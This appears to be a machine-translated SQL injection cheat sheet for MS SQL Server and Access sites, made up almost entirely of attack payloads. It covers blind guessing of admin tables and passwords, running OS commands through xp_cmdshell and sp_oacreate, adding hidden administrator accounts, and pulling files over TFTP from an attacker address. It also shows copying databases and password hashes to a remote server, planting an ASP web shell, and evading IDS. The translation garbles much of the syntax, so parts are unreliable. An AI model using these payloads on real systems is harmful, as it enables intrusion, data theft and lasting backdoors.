When it comes to injection, you may think of tools such as ah d and Ming Kido. Sometimes you can use these tools to easily scan the injection points and guess the account password, however, you may not fully master the principles.
Nowadays, more and more people rely on tools and ignore the essential things. It's all about basic things.
First, determine whether there are any injection points
'; And 1 = 1 and 1 = 2
Second, guess the table. Common tables include admin adminuser user pass password ..
And 0 <> (select count (*) from *)
And 0 <> (select count (*) from admin)-determine whether the admin table exists
Third, if the number of accounts is 0, <return correct page 1 <return error page indicating that the number of accounts is 1
And 0 <(select count (*) from admin)
And 1 <(select count (*) from admin)
Fourth, add the field name that we think of in len () brackets.
And 1 = (select count (*) from admin where len (*)> 0 )-
And 1 = (select count (*) from admin where len (User field name)> 0)
And 1 = (select count (*) from admin where len (_ blank> password field name password)> 0)
Fifth, the length of each field is changed to 0 until the correct page is returned.
And 1 = (select count (*) from admin where len (*)> 0)
And 1 = (select count (*) from admin where len (name)> 6) Error
And 1 = (select count (*) from admin where len (name)> 5) the correct length is 6
And 1 = (select count (*) from admin where len (name) = 6) Correct
And 1 = (select count (*) from admin where len (password)> 11) Correct
And 1 = (select count (*) from admin where len (password)> 12) the error length is 12
And 1 = (select count (*) from admin where len (password) = 12) Correct
Sixth guess character
And 1 = (select count (*) from admin where left (name, 1) = a)-guesses the first place of the user account
And 1 = (select count (*) from admin where left (name, 2) = AB)-Second place of the user account
In this way, you can add a character to guess the number of digits you have just guessed. Even if the account has come out
And 1 = (select top 1 count (*) from Admin where Asc (mid (pass, 5, 1) = 51 )-
This query statement can be used to guess the chinese user and the _ blank> password. You only need to replace the following number with the Chinese ASSIC code, and then convert the result to a character.
Group by users. id having 1 = 1-
Group by users. id, users. username, users. password, users. privs having 1 = 1-
; Insert into users values (666, attacker, foobar, 0 xffff )-
UNION Select TOP 1 COLUMN_blank> _ name from INFORMATION_blank> _ SCHEMA. COLUMNS Where TABLE_blank> _ NAME = logintable-
UNION Select TOP 1 COLUMN_blank> _ name from INFORMATION_blank> _ SCHEMA. COLUMNS Where TABLE_blank> _ NAME = logintable Where COLUMN_blank> _ name not in (login_blank> _ id )-
UNION Select TOP 1 COLUMN_blank> _ name from INFORMATION_blank> _ SCHEMA. COLUMNS Where TABLE_blank> _ NAME = logintable Where COLUMN_blank> _ name not in (login_blank> _ id, login_blank> _ name )-
UNION Select TOP 1 login_blank> _ name FROM logintable-
UNION Select TOP 1 password FROM logintable where login_blank> _ name = Rahul-
Check _ blank> server patch = SP4 patch hit Error
And 1 = (select @ VERSION )-
Check the permissions of the _ blank> database connection account. The returned result is normal, proving that the permissions are _ blank> sysadmin permissions of the server role.
And 1 = (Select IS_blank> _ SRVROLEMEMBER (sysadmin ))-
Determine the connection _ blank> database account. (Using the SA account for connection returns normal = proves that the connection account is SA)
And sa = (Select System_blank> _ user )-
And user_blank> _ name () = dbo-
And 0 <> (select user_blank> _ name ()-
Check whether xp_blank> _ empty shell is deleted.
And 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = x and name = xp_blank> _ empty shell )-
Xp_blank> _ restore shell is deleted and restored. It supports absolute path recovery.
; EXEC master. dbo. sp_blank> _ addextendedproc xp_blank> _ mongoshell, xplog70.dll-
; EXEC master. dbo. sp_blank> _ addextendedproc xp_blank> _ empty shell, c: \ inetpub \ wwwroot \ xplog70.dll-
PING your own lab in reverse order
; Use master; declare @ s int; exec sp_blank> _ oacreate "wscript. shell", @ s out; exec sp_blank> _ oamethod @s, then run the command, run the command cmd.exe/c ping 192.168.0.1 ″;-
Add account
; DECLARE @ shell int exec SP_blank> _ OACreate wscript. shell, @ shell output exec SP_blank> _ OAMETHOD @ shell, run, null, C: \ WINNT \ system32 \ cmd.exe/c net user jiaoniang $1866574/add-
Create a virtual directory edisk:
; Declare @ o int exec sp_blank> _ oacreate wscript. shell, @ o out exec sp_blank> _ oamethod @ o, run, NULL, cscript.exe c: \ inetpub \ wwwroot \ mkwebdir. vbs-w "Default Web site"-v "e", "e :\"-
Access attributes: (write a webshell together)
Declare @ o int exec sp_blank> _ oacreate wscript. shell, @ o out exec sp_blank> _ oamethod @ o, run, NULL, cscript.exe c: \ inetpub \ wwwroot \ chaccess. vbs-a w3svc/1/ROOT/e + browse
Tip: % 5c = \ or submit/and \ modify % 5
And 0 <> (select top 1 paths from newtable )-
Obtain the Database Name (from 1 to 5 is the System id, more than 6 can be determined)
And 1 = (select name from master. dbo. sysdatabases where dbid = 7 )-
And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6)
Submit dbid =, 9... in sequence .... Get more _ blank> database names
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U ).
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U and name not in (Admin) to obtain other tables.
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = U and name = admin
And uid> (str (id) the value of the brute-force UID is assumed to be 18779569 uid = id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569) to obtain an admin field, which is assumed to be user_blank> _ id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569 and name not in
(Id ,...)) To expose other fields
And 0 <(select user_blank> _ id from BBS. dbo. admin where username> 1) Get the user name
In turn, you can get the _ blank> password ..... Assume that user_blank> _ id username, password, and other fields exist.
And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6)
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U)
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U and name not in (Address ))
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = U and name = admin and uid> (str (id) determine the id value
And 0 <> (select top 1 name from BBS. dbo. syscolumns where id = 773577794) All fields
? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin
? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin (union, access is also useful)
Obtain the WEB path
; Create table [dbo]. [swap] ([swappass] [char] (255 ));-
And (select top 1 swappass from swap) = 1-
; Create TABLE newtable (id int IDENTITY (500), paths varchar () Declare @ test varchar (20) exec master .. xp_blank> _ regread @ rootkey = HKEY_blank> _ LOCAL_blank> _ MACHINE, @ key = SYSTEM \ CurrentControlSet \ Services \ W3SVC \ Parameters \ Virtual Roots \, @ value_blank> _ name = /, values = @ test OUTPUT insert into paths (path) values (@ test )-
; Use ku1 ;-
; Create table cmd (str image);-create an image-type table cmd
The test process of xp_blank> _ cmdshell exists:
; Exec master .. xp_blank> _ your shell dir
; Exec master. dbo. sp_blank> _ addlogin jiaoniang $;-add an SQL account
; Exec master. dbo. sp_blank> _ password null, jiaoniang $, 1866574 ;-
; Exec master. dbo. sp_blank> _ addsrvrolemember jiaoniang $ sysadmin ;-
; Exec master. dbo. xp_blank> _ your shell net user jiaoniang $1866574/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes/add ;-
; Exec master. dbo. xp_blank> _ your shell net localgroup administrators jiaoniang $/add ;-
Exec master.. xp_blank> _ servicecontrol start, schedule start _ blank> Service
Exec master .. xp_blank> _ servicecontrol start, server
; DECLARE @ shell int exec SP_blank> _ OACreate wscript. shell, @ shell output exec SP_blank> _ OAMETHOD @ shell, run, null, C: \ WINNT \ system32 \ cmd.exe/c net user jiaoniang $1866574/add
; DECLARE @ shell int exec SP_blank> _ OACreate wscript. shell, @ shell output exec SP_blank> _ OAMETHOD @ shell, run, null, C: \ WINNT \ system32 \ cmd.exe/c net localgroup administrators jiaoniang $/add
; Exec master.. xp_blank> _ using shell tftp-I youip get file.exe-use TFTP to upload files
; Declare @ a sysname set @ a = xp_blank> _ + your shell exec @ a dir c :\
; Declare @ a sysname set @ a = xp + _ blank> _ cm '+ 'dshell exec @ a dir c :\
; Declare @ a; set @ a = db_blank> _ name (); backup database @ a to disk = your IP address your shared directory bak. dat
If it is restricted, you can.
Select * from openrowset (_ blank> sqloledb, server; sa;, select OK! Exec master. dbo. sp_blank> _ addlogin hax)
Query structure:
Select * FROM news Where id =... AND topic =... AND .....
Adminand 1 = (select count (*) from [user] where username = victim and right (left (userpass, 01), 1) = 1) and userpass <>
Select 123 ;-
; Use master ;-
: A or name like fff %;-a user named ffff is displayed.
And 1 <> (select count (email) from [user]);-
; Update [users] set email = (select top 1 name from sysobjects where xtype = u and status> 0) where name = ffff ;-
; Update [users] set email = (select top 1 id from sysobjects where xtype = u and name = ad) where name = ffff ;-
; Update [users] set email = (select top 1 name from sysobjects where xtype = u and id> 581577110) where name = ffff ;-
; Update [users] set email = (select top 1 count (id) from password) where name = ffff ;-
; Update [users] set email = (select top 1 pwd from password where id = 2) where name = ffff ;-
; Update [users] set email = (select top 1 name from password where id = 2) where name = ffff ;-
The above statement is to get the first user table in the _ blank> database, and put the table name in the ffff user's mailbox field.
By viewing ffff user information, you can obtain the first table named ad.
Then, the ID of the table is obtained based on the table name ad. The name of the second table is obtained.
Insert into users values (666, char (0 × 63) + char (0 × 68) + char (0 × 72) + char (0 × 69) + char (0 × 73), char (0 × 63) + char (0 × 68) + char (0 × 72) + char (0 × 69) + char (0 × 73), 0 xffff )-
Insert into users values (667,123,123, 0 xffff )-
Insert into users values (123, admin-, password, 0 xffff )-
; And user> 0
; And (select count (*) from sysobjects)> 0
; And (select count (*) from mysysobjects)> 0 // access_blank> Database
Name of a data table
; Update aaa set aaa = (select top 1 name from sysobjects where xtype = u and status> 0 );-
This is to update the first table name to the aaa field.
Read the first table. The second table can be read in this way (ADD and name <> the name of the table just obtained after the condition ).
; Update aaa set aaa = (select top 1 name from sysobjects where xtype = u and status> 0 and name <> vote );-
Then id = 1552 and exists (select * from aaa where aaa> 5)
Read the second table one by one until no.
The read field is as follows:
; Update aaa set aaa = (select top 1 col_blank> _ name (object_blank> _ id (table name), 1 ));-
Then id = 152 and exists (select * from aaa where aaa> 5) error.
; Update aaa set aaa = (select top 1 col_blank> _ name (object_blank> _ id (table name), 2 ));-
Then id = 152 and exists (select * from aaa where aaa> 5) error.
[Retrieve data table name] [update the field value to the table name, and read the value of this field to get the table name]
Update table name set field = (select top 1 name from sysobjects where xtype = u and status> 0 [and name <> Add one to the table name you get]) [where condition] select top 1 name from sysobjects where xtype = u and status> 0 and name not in (table1, table2 ,...)
Through SQLSERVER injection _ blank> vulnerability creation _ blank> Database Administrator Account and System Administrator account [the current account must be a SYSADMIN Group]
[Obtain the field name of a data table] [update the field value to the field name, and then read the value of this field to obtain the field name]
Update table name set field = (select top 1 col_blank> _ name (object_blank> _ id (name of the data table to be queried), field column for example: 1) [where condition]
Bypassing IDS detection [using variables]
; Declare @ a sysname set @ a = xp_blank> _ + your shell exec @ a dir c :\
; Declare @ a sysname set @ a = xp + _ blank> _ cm '+ 'dshell exec @ a dir c :\
1. enable remote _ blank> Database
Basic syntax
Select * from OPENROWSET (SQLOLEDB, server = servername; uid = sa; pwd = 123, select * from table1)
Parameter: (1) OLEDB Provider name
2. The connection string parameter can be any port used for connection, for example
Select * from OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433;, select * from table
3. Copy the entire _ blank> database insert all remote tables of the target host to the local table.
Basic Syntax:
Insert into OPENROWSET (SQLOLEDB, server = servername; uid = sa; pwd = 123, select * from table1) select * from table2
This line of statements copies all the data in table 2 on the target host to table 1 in the remote _ blank> database. In actual use, modify the IP address and port of the connection string to point to the desired location, for example:
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433;, select * from table1) select * from table2
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433;, select * from _ blank> _ sysdatabases)
Select * from master. dbo. sysdatabases
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433;, select * from _ blank> _ sysobjects)
Select * from user_blank> _ database. dbo. sysobjects
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433;, select * from _ blank> _ syscolumns)
Select * from user_blank> _ database. dbo. syscolumns
Copy _ blank> database:
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433;, select * from table1) select * from database .. table1
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433;, select * from table2) select * from database .. table2
Copy the HASH table (hash) logon _ blank> password HASH and store it in sysxlogins. The method is as follows:
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192.168.0.1, 1433;, select * from _ blank> _ sysxlogins) select * from database. dbo. sysxlogins
After obtaining the hash, you can perform brute-force cracking.
To traverse the directory, create a temporary table: temp.
; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));-
; Insert temp exec master. dbo. xp_blank> _ availablemedia;-Get all current drives
; Insert into temp (id) exec master. dbo. xp_blank> _ subdirs c: \;-obtain the subdirectory list
; Insert into temp (id, num1) exec master. dbo. xp_blank> _ dirtree c: \;-get the directory tree structure of all subdirectories and import them to the temp table.
; Insert into temp (id) exec master. dbo. xp_blank> _ your shell type c: \ web \ index. asp;-view the content of a file
; Insert into temp (id) exec master. dbo. xp_blank> _ your shell dir c :\;-
; Insert into temp (id) exec master. dbo. xp_blank> _ your shell dir c: \ *. asp/s/;-
; Insert into temp (id) exec master. dbo. xp_blank> _ Empty Shell cscript C: \ Inetpub \ AdminScripts \ adsutil. vbs enum w3svc
; Insert into temp (id, num1) exec master. dbo. xp_blank> _ dirtree c: \;-(xp_blank> _ dirtree permission PUBLIC)
Write table:
Statement 1: and 1 = (Select IS_blank> _ SRVROLEMEMBER (sysadmin ));-
Statement 2: and 1 = (Select IS_blank> _ SRVROLEMEMBER (serveradmin ));-
Statement 3: and 1 = (Select IS_blank> _ SRVROLEMEMBER (setupadmin ));-
Statement 4: and 1 = (Select IS_blank> _ SRVROLEMEMBER (securityadmin ));-
Statement 5: and 1 = (Select IS_blank> _ SRVROLEMEMBER (securityadmin ));-
Statement 6: and 1 = (Select IS_blank> _ SRVROLEMEMBER (diskadmin ));-
Statement 7: and 1 = (Select IS_blank> _ SRVROLEMEMBER (bulkadmin ));-
Statement 8: and 1 = (Select IS_blank> _ SRVROLEMEMBER (bulkadmin ));-
Statement 9: and 1 = (Select IS_blank> _ MEMBER (db_blank> _ owner ));-
Write the path to the table:
; Create table dirs (paths varchar (100), id int )-
; Insert dirs exec master. dbo. xp_blank> _ dirtree c :\-
And 0 <> (select top 1 paths from dirs )-
And 0 <> (select top 1 paths from dirs where paths not in (@ Inetpub ))-
; Create table dirs1 (paths varchar (100), id int )-
; Insert dirs exec master. dbo. xp_blank> _ dirtree e: \ web-
And 0 <> (select top 1 paths from dirs1 )-
Back up the _ blank> database to the webpage Directory: Download
; Declare @ a sysname; set @ a = db_blank> _ name (); backup database @ a to disk = e: \ web \ down. bak ;-
And 1 = (Select top 1 name from (Select top 12 id, name from sysobjects where xtype = char (85) T order by id desc)
And 1 = (Select Top 1 col_blank> _ name (object_blank> _ id (USER_blank> _ LOGIN), 1) from sysobjects) See related tables.
And 1 = (select user_blank> _ id from USER_blank> _ LOGIN)
And 0 = (select user from USER_blank> _ LOGIN where user> 1)
-=-Wscript. shell example-=-
Declare @ o int
Exec sp_blank> _ oacreate wscript. shell, @ o out
Exec sp_blank> _ oamethod @ o, run, NULL, notepad.exe
; Declare @ o int exec sp_blank> _ oacreate wscript. shell, @ o out exec sp_blank> _ oamethod @ o, run, NULL, notepad.exe-
Declare @ o int, @ f int, @ t int, @ ret int
Declare @ line varchar (8000)
Exec sp_blank> _ oacreate scripting. filesystemobject, @ o out
Exec sp_blank> _ oamethod @ o, opentextfile, @ f out, c: \ boot. ini, 1
Exec @ ret = sp_blank> _ oamethod @ f, readline, @ line out
While (@ ret = 0)
Begin
Print @ line
Exec @ ret = sp_blank> _ oamethod @ f, readline, @ line out
End
Declare @ o int, @ f int, @ t int, @ ret int
Exec sp_blank> _ oacreate scripting. filesystemobject, @ o out
Exec sp_blank> _ oamethod @ o, createtextfile, @ f out, c: \ inetpub \ wwwroot \ foo. asp, 1
Exec @ ret = sp_blank> _ oamethod @ f, writeline, NULL,
<% Set o = server. createobject ("wscript. shell"): o. run (request. querystring ("cmd") %>
Declare @ o int, @ ret int
Exec sp_blank> _ oacreate speech. voicetext, @ o out
Exec sp_blank> _ oamethod @ o, register, NULL, foo, bar
Exec sp_blank> _ oasetproperty @ o, speed, 150
Exec sp_blank> _ oamethod @ o, speak, NULL, all your sequel servers are belong to, us, 528
Waitfor delay 00:00:05
; Declare @ o int, @ ret int exec sp_blank> _ oacreate speech. voicetext, @ o out exec sp_blank> _ oamethod @ o, register, NULL, foo, bar exec sp_blank> _ oasetproperty @ o, speed, 150 exec sp_blank> _ oamethod @ o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-
Xp_blank> _ dirtree permission PUBLIC
Exec master. dbo. xp_blank> _ dirtree c :\
The returned information includes two fields subdirectory and depth. The Subdirectory field is the accept type, and the depth field is the integer field.
Create table dirs (paths varchar (100), id int)
Create a table. The table created here is connected to xp_blank> _ dirtree. The fields are equal and the types are the same.
Insert dirs exec master. dbo. xp_blank> _ dirtree c :\
As long as the table creation definition is equal to the field returned by the storage process, it can be executed! To write the table, step by step to achieve the information we want!